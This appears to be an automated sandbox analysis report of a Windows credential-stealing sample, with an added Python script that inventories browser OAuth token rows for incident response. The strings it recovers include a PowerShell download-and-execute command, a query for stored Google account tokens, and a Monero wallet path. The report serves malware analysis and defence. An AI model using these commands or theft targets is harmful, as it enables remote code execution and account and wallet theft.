                            • lstrlen.KERNEL32(00000000), ref: 0038BDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 7b0776277699f218ba864e62308f9e823e188708d95b25aedd59999d087f822a
                            • Instruction ID: 67c0bd1e56b15e401caf2c0f9e538af44717d56aa04d88ec3af7af763cc8b6ea
                            • Opcode Fuzzy Hash: 7b0776277699f218ba864e62308f9e823e188708d95b25aedd59999d087f822a
                            • Instruction Fuzzy Hash: 83B141729106189BDF06FBA0DD96EEE7778BF54300F404258F506AA091EF346E49DBE2
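                             The strings AccountId, AccountTokens and SELECT service, encrypted_token FROM token_service identify what this function reads: the token_service table of a Chromium-based browser's Web Data SQLite database, where the browser keeps the encrypted OAuth refresh tokens of the Google accounts signed into the profile, one row per account. The Python below is an added triage helper and not code from the report or from the sample: it runs the same query the sample embeds against an evidence copy of a Web Data file opened read-only and inventories which accounts had a token on disk, without decrypting anything. Assumptions, also marked in the code: the service column is keyed as AccountId-<id> (inferred from the AccountId string above), the v10 prefix marks Chrome's OSCrypt AES-GCM format on Windows while the 01 00 00 00 D0 8C 9D DF header marks a raw DPAPI blob, and the database the script builds for the demonstration is constructed with only the two columns the query names.

```python
import sqlite3
import tempfile
from pathlib import Path
from typing import Dict

# Query recovered from the sample's strings (see the String ID above).
TOKEN_QUERY = "SELECT service, encrypted_token FROM token_service"
# Assumption: the browser keys each refresh token as "AccountId-<account id>";
# inferred from the "AccountId" string the sample searches for with StrStrA.
ACCOUNT_PREFIX = "AccountId-"


def classify_blob(blob: bytes) -> str:
    """Name the at-rest format of an encrypted_token value without decrypting it."""
    if not blob:
        return "empty"
    if blob.startswith(b"v10"):
        # Assumption: Chrome on Windows prefixes OSCrypt AES-GCM ciphertext with "v10";
        # the AES key is itself DPAPI-wrapped in the profile's Local State file.
        return "oscrypt-v10"
    if blob.startswith(b"\x01\x00\x00\x00\xd0\x8c\x9d\xdf"):
        # DPAPI blob header (version 1, provider GUID): decryptable only in the user's context.
        return "dpapi"
    return "unknown"


def inventory_token_service(db_path: str) -> Dict[str, dict]:
    """Run the sample's query against an evidence copy of Web Data, opened read-only."""
    uri = Path(db_path).resolve().as_uri() + "?mode=ro"
    con = sqlite3.connect(uri, uri=True)
    try:
        rows = con.execute(TOKEN_QUERY).fetchall()
    finally:
        con.close()
    result: Dict[str, dict] = {}
    for service, blob in rows:
        blob = blob or b""
        result[service] = {
            "account": service[len(ACCOUNT_PREFIX):] if service.startswith(ACCOUNT_PREFIX) else None,
            "token_bytes": len(blob),
            "format": classify_blob(blob),
        }
    return result


def build_sample_db(db_path: str) -> None:
    """Constructed stand-in for a Web Data file: only the two columns the query names."""
    con = sqlite3.connect(db_path)
    con.execute("CREATE TABLE token_service (service VARCHAR PRIMARY KEY NOT NULL, encrypted_token BLOB)")
    con.executemany("INSERT INTO token_service VALUES (?, ?)", [
        ("AccountId-1234567890", b"v10" + bytes(range(12)) + bytes(32)),            # constructed, not real ciphertext
        ("AccountId-0987654321", b"\x01\x00\x00\x00\xd0\x8c\x9d\xdf" + bytes(24)),  # constructed DPAPI-style header
        ("not-an-account", b""),                                                   # constructed edge case
    ])
    con.commit()
    con.close()


def run_demo() -> Dict[str, dict]:
    """Build the constructed database in a temporary directory and inventory it."""
    with tempfile.TemporaryDirectory() as tmp:
        db = str(Path(tmp) / "Web Data")
        build_sample_db(db)
        return inventory_token_service(db)


if __name__ == "__main__":
    for service, info in run_demo().items():
        print(f"{service}: account={info['account']} format={info['format']} bytes={info['token_bytes']}")
```

                             Point inventory_token_service at a copy of the profile's Web Data file (for Chrome, under %LOCALAPPDATA%\Google\Chrome\User Data\<profile>) taken while the browser is closed, so the copy is consistent and the read-only open does not touch the original. Every AccountId row in the output is an account whose refresh token was on disk when the sample ran, which is the list to revoke from the account's security settings; the v10 rows additionally tell you the attacker needed the Local State key, which the same profile directory provides.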
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 2b566722f51e37453ee8ee065ca5b3221a9a7f43ebfb754635db2598cdba3ceb
                            • Instruction ID: 79a8265c5936548aa9c5a27bd38ea24e9cc9f2bf2a862d9709ccbc26b039a99a
                            • Opcode Fuzzy Hash: 2b566722f51e37453ee8ee065ca5b3221a9a7f43ebfb754635db2598cdba3ceb
                            • Instruction Fuzzy Hash: 9FF05E3590520DEFD7449FE0ED1EB2C7FB4FB1470BF040199E60986290D6704B46AB96
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00384FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00384FD1
                            • InternetOpenA.WININET(003A0DDF,00000000,00000000,00000000,00000000), ref: 00384FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00385011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00385041
                            • InternetCloseHandle.WININET(?), ref: 003850B9
                            • InternetCloseHandle.WININET(?), ref: 003850C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: ed9ef68628e03aa4eba4899b8eea2de5b581b958ad73c92089e1edac346a2f61
                            • Instruction ID: 3887ab6cfcd3adbea5c93de419f1a2112df41f8f2199513d8a410d4067708ddc
                            • Opcode Fuzzy Hash: ed9ef68628e03aa4eba4899b8eea2de5b581b958ad73c92089e1edac346a2f61
                            • Instruction Fuzzy Hash: 4D31F7F4A0021CABDB20DF54DC85BDDBBB4FB48708F1081D9EA09A7281D7706AC59F99
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00398426
                            • wsprintfA.USER32 ref: 00398459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0039847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0039848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00398499
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,0115E370,00000000,000F003F,?,00000400), ref: 003984EC
                            • lstrlen.KERNEL32(?), ref: 00398501
                            • RegQueryValueExA.ADVAPI32(00000000,0115E1C0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003A0B34), ref: 00398599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00398608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0039861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: e4bb417d9937b2119fe535c10f980c29a88008b83c8b839fd1f3f95a3b22ffa4
                            • Instruction ID: 3e6b7ed1cc97d9c1da75357b18dfc09011897963d97e64a7b6ce016433c36981
                            • Instruction Fuzzy Hash: BB21E77191022CAFDB24DB54DC85FE9B7B8FB48704F00C598E649A6140DF71AA85CFE4
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003976A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003976AB
                            • RegOpenKeyExA.ADVAPI32(80000002,0114C0A8,00000000,00020119,00000000), ref: 003976DD
                            • RegQueryValueExA.ADVAPI32(00000000,0115E2C8,00000000,00000000,?,000000FF), ref: 003976FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00397708
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: cb8db5e02f2800df3a77282e64789d8ef4bd6adad56fadcc4b767b83ff80461e
                            • Instruction ID: d2e6878628788803fc740dcb17c03927ac5f5ad17e326620573cbb17d08cb6f6
                            • Instruction Fuzzy Hash: 31014FB5A04608BFEB00DBE4DC49F7ABBB8EB58705F104454FA04D7291E67099089B51
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0039773B
                            • RegOpenKeyExA.ADVAPI32(80000002,0114C0A8,00000000,00020119,003976B9), ref: 0039775B
                            • RegQueryValueExA.ADVAPI32(003976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0039777A
                            • RegCloseKey.ADVAPI32(003976B9), ref: 00397784
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 08a8ea59ff27b3b53c6e1d2a04e8d88fabd05030b4b664760667eb91ad1d3b29
                            • Instruction ID: a241734f3ffb934f4067e92453623950949a34bd48407d1420da31ee2bfcd2ff
                            • Instruction Fuzzy Hash: FE0112B5A4030CBFEB00DBE4DC4AFBEBBB8EB58705F104559FA05A7281DB705A049B91
                            APIs
                            • CreateFileA.KERNEL32(:9,80000000,00000003,00000000,00000003,00000080,00000000,?,00393AEE,?), ref: 003992FC
                            • GetFileSizeEx.KERNEL32(000000FF,:9), ref: 00399319
                            • CloseHandle.KERNEL32(000000FF), ref: 00399327
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :9$:9
                            • API String ID: 1378416451-4108897303
                            • Opcode ID: 3943233a66b01b6e75de5f958ebd01fc48ae45172291cf9d6ceac6b5de662fbb
                            • Instruction ID: 452fd9cbc717bd64792a471d4d0a085ea2f1c856977c538733bc99e97081d0a1
                            • Instruction Fuzzy Hash: 06F03C79E40208FBDF10DFB4DC49F9E7BF9EB58710F118258B651A72C0E67096459B50
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 251152cac92f4f1204448afad754a70a7fbe69006cd60e1841eef95597b80e19
                            • Instruction ID: 00f62bc10d2f06762c1ce2811320b38808553349923b31f288be8432a9452333
                            • Instruction Fuzzy Hash: 803116B4A00309EFDB15DF94C885FAE7BB9FF48304F108199E911A7290D778AA45CFA1
                            APIs
                            • lstrcat.KERNEL32(?,0115E538), ref: 003947DB
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00394801
                            • lstrcat.KERNEL32(?,?), ref: 00394820
                            • lstrcat.KERNEL32(?,?), ref: 00394834
                            • lstrcat.KERNEL32(?,0114B958), ref: 00394847
                            • lstrcat.KERNEL32(?,?), ref: 0039485B
                            • lstrcat.KERNEL32(?,0115DC00), ref: 0039486F
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 00398D90: GetFileAttributesA.KERNEL32(00000000,?,00381B54,?,?,003A564C,?,?,003A0E1F), ref: 00398D9F
                              • Part of subcall function 00394570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00394580
                              • Part of subcall function 00394570: RtlAllocateHeap.NTDLL(00000000), ref: 00394587
                              • Part of subcall function 00394570: wsprintfA.USER32 ref: 003945A6
                              • Part of subcall function 00394570: FindFirstFileA.KERNEL32(?,?), ref: 003945BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 8f0cf2a26f38902b8e247d5a0c2c5906185ebdd31018c958c6d3f14b4ccf1214
                            • Instruction ID: 8ab92cd689779097317d1f8185965364b3abbca654ce664b8130c6dff7d0d0ac
                            • Instruction Fuzzy Hash: F13184B290021C5BCF12F7B0DC85EE9777CAB58704F404589B315EA081EE749B8ECB95
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00392D85
                            Strings
                            • <, xrefs: 00392D39
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00392CC4
                            • ')", xrefs: 00392CB3
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00392D04
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: e17f70629b6f4febc3789008b0e9eb9644165db486d0556991bdd3a4ae6b2afc
                            • Instruction ID: 3d89e451b0134de5cba17644aebd4d6396d4cca1548951fe18068c7e3cbefaae
                            • Instruction Fuzzy Hash: D641BD71C106189ADF1AEBA0C892FEDBB78AF14300F404219E116AA191DF746A4ADFD6
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00389F41
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: bc78e0da8bdcfd688d55708eac6e874ddd8bd4f4e50420e2eaa3728b1a275d4a
                            • Instruction ID: 9ee28b8b92e5744d7de88d3264d86ab76f5a7fd1a6e6a7786fb44071c7f4bd18
                            • Instruction Fuzzy Hash: 99612D71A10748DBDF15EFA4CC96BED7779AF45300F008118F90A5F591EB746A06CB92
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,0115DA40,00000000,00020119,?), ref: 003940F4
                            • RegQueryValueExA.ADVAPI32(?,0115E418,00000000,00000000,00000000,000000FF), ref: 00394118
                            • RegCloseKey.ADVAPI32(?), ref: 00394122
                            • lstrcat.KERNEL32(?,00000000), ref: 00394147
                            • lstrcat.KERNEL32(?,0115E550), ref: 0039415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: 7d106905d594611ce35351b287359d5b8648642e7e66f62dab909754a20236cb
                            • Instruction ID: d151493793ad9709ab334dca937bede1bb1ded965656a3f3972f70a333d3f370
                            • Instruction Fuzzy Hash: 8B4187B6D0020C6BDF15FBA0EC46FFE777DAB98304F004558B6199A181EA755B8C8BD2
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00397E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00397E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,0114C2D8,00000000,00020119,?), ref: 00397E5E
                            • RegQueryValueExA.ADVAPI32(?,0115DC80,00000000,00000000,000000FF,000000FF), ref: 00397E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00397E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: d4968b7530e54424e6999bafa8548eef040f1453c896672dd88b34ffd5d39349
                            • Instruction ID: 78733bb401f4613260b543a5ff669a32013de9ad7076e20188d879113f4ef110
                            • Opcode Fuzzy Hash: d4968b7530e54424e6999bafa8548eef040f1453c896672dd88b34ffd5d39349
                            • Instruction Fuzzy Hash: DF118CB1A44609EFDB04CB95DD4AFBBBBBCFB04B04F104119F605A7280D77458049BA1
                            APIs
                            • StrStrA.SHLWAPI(0115E178,?,?,?,0039140C,?,0115E178,00000000), ref: 0039926C
                            • lstrcpyn.KERNEL32(005CAB88,0115E178,0115E178,?,0039140C,?,0115E178), ref: 00399290
                            • lstrlen.KERNEL32(?,?,0039140C,?,0115E178), ref: 003992A7
                            • wsprintfA.USER32 ref: 003992C7
                            Strings
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: c0b38f44ade179499bf96e16e66e2c105aa0a22b8fd221d44008c373eb58d8d3
                            • Instruction ID: ad1e8d353323ad1ad146f47ad606d3f36ffbee88219628bbf869166dbc264012
                            • Opcode Fuzzy Hash: c0b38f44ade179499bf96e16e66e2c105aa0a22b8fd221d44008c373eb58d8d3
                            • Instruction Fuzzy Hash: 86019E7550020CAFCB04DFE8C988EAE7BB9EB58358F148548F9099B204C635AA549B91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003812B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003812BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003812D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003812F5
                            • RegCloseKey.ADVAPI32(?), ref: 003812FF
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: bdbbd0f8790430e57e8f981b4ff9e92a0810127794de3b5be4fba790d75114c2
                            • Instruction ID: 4ca217422f8899104f96c4f287e36d8c2bc56c00aba07c8c38476ef559920c89
                            • Opcode Fuzzy Hash: bdbbd0f8790430e57e8f981b4ff9e92a0810127794de3b5be4fba790d75114c2
                            • Instruction Fuzzy Hash: 24011DB9A4020CBFDB00DFE0DC49FAEBBB8EB48705F008159FA0597280D6709A059B91
                            APIs
                            Strings
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 7b7341884404827fefde2bc9778f001e2f98673208f2b33b9ff481b007edd087
                            • Instruction ID: 916c93572e2d7d2c5c4c434819b838a97b06b298ac9cb1c8cdbdc1a611792908
                            • Opcode Fuzzy Hash: 7b7341884404827fefde2bc9778f001e2f98673208f2b33b9ff481b007edd087
                            • Instruction Fuzzy Hash: 2141F5B151079C5EDF228B248D95FFBBBECAB45704F1854E8E98A86182D3719A44CF60
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00396663
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00396726
                            • ExitProcess.KERNEL32 ref: 00396755
                            Strings
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 9f8a8cead0972a08c0e7e563685b8fd9f588e0784b7b717534e887cc33e8fc26
                            • Instruction ID: d910416e87135a02df21188dea274fd6c4520ac9f441bf93b399fba75cf1a555
                            • Opcode Fuzzy Hash: 9f8a8cead0972a08c0e7e563685b8fd9f588e0784b7b717534e887cc33e8fc26
                            • Instruction Fuzzy Hash: 98312CB1801618ABDF15EB90DC96FDEBB78AF54300F404189F2096A191DF746B49CFAA
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003A0E28,00000000,?), ref: 0039882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00398836
                            • wsprintfA.USER32 ref: 00398850
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            Strings
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 80f2d3dfe9bfd0abfb9f826924e3bb5212bb61981908b48d67e78cc070dd4ad7
                            • Instruction ID: 6132db35c8259e01b110a38edf589d10516b125139312c7cb7f82438d3c5d01b
                            • Opcode Fuzzy Hash: 80f2d3dfe9bfd0abfb9f826924e3bb5212bb61981908b48d67e78cc070dd4ad7
                            • Instruction Fuzzy Hash: 17214CB1E40608AFDB04DFD8DD49FAEBBB8FB48B05F104119F605A7280C779A904DBA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0039951E,00000000), ref: 00398D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00398D62
                            • wsprintfW.USER32 ref: 00398D78
                            Strings
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 1925e22a0a79c05c3fae585f3ccec872b38b473f53a345c642ae958e597cb56e
                            • Instruction ID: d4ca25468d2c90a7e9750373d6ed5c2b3ea3f849062d1a79ee7a9a51fc39b50f
                            • Opcode Fuzzy Hash: 1925e22a0a79c05c3fae585f3ccec872b38b473f53a345c642ae958e597cb56e
                            • Instruction Fuzzy Hash: A6E08CB0A4020CBFE700DB94DC0AE697BBCEB0470AF000094FD0997280DA719E04AB96
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0038A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0038A6BC
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0038A743
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: a0a9ea63f3aa0dc60cc1cbec6669e7d03fd1605e1934a097dec42700debebc01
                            • Instruction ID: e5e054d027b8cc5a4822bbbd9da4983cee8c4a5d289f3d8ee53e6547ddb46a4e
                            • Opcode Fuzzy Hash: a0a9ea63f3aa0dc60cc1cbec6669e7d03fd1605e1934a097dec42700debebc01
                            • Instruction Fuzzy Hash: 9BE1EF728205189BDF06FBA4DC92EEE7738BF14300F508259F5167A091EF306A4DDBA6
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
